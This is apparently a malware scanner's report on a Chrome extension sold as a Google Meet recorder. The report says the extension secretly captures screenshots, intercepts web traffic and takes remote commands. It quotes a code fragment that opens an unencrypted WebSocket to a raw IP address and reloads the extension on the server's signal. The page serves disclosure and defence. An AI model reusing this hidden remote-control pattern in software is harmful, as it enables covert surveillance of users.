Security Alert: Malware Risk Confirmed
IMTMeet
ID: opbjlkgdnhjoljkfeokhnjmnlkoekjkf
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- IMTLazarusView Profile
- Privacy
- Privacy Policy
- Country
- ES
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
- Address
- Arteagabeitia, 41 Barakaldo, Vizcaya 48902 ES
- Website
- Visit
Graba tu sala de trabajo en Meet y la sube directo a Google Drive.
The Chrome Web Store listing describes this extension as a Google Meet session recorder that uploads to Google Drive (productivity use case), but the manifest internally identifies it as a 'remote filtering agent' and every JS file implements continuous screenshot exfiltration, full web-request interception, and remote command execution — none of which match the disclosed listing purpose. This deliberate mismatch hides the extension's surveillance function from users who would install a perceived screen-recording tool, and is consistent with the policy_violation reason cited for CWS removal.
{ "description": "IMTLazarus's remote filtering agent for Chrome."}The extension establishes an unencrypted WebSocket connection to a raw IP address (137.74.170.11:8123) that is unrelated to the publisher's declared domain (imtlazarus.com). Messages received from this third-party server directly control the extension's lifecycle: if the server does not respond with 'TUNELUP', the extension calls chrome.runtime.reload(). This gives an external, non-publisher-associated server the ability to trigger extension restarts, and the unencrypted channel could be intercepted or spoofed.
ws = new WebSocket('ws://137.74.170.11:8123');ws.onmessage = function(event) { estadotunelinternet = event.data; //console.log('Túnel Estado: ' + event.data);}}...function recarga() { console.log('Internet Estado: ' + estadotunelinternet); if (estadotunelinternet == "TUNELUP") { continuar(); } else { chrome.runtime.reload(); }}By severity
Versions scanned
Showing 1 of 3 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 3.9 | 2 |
Files with findings
2 distinct paths — top paths by unique finding count:
- js/control.js1
- manifest.json1
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.
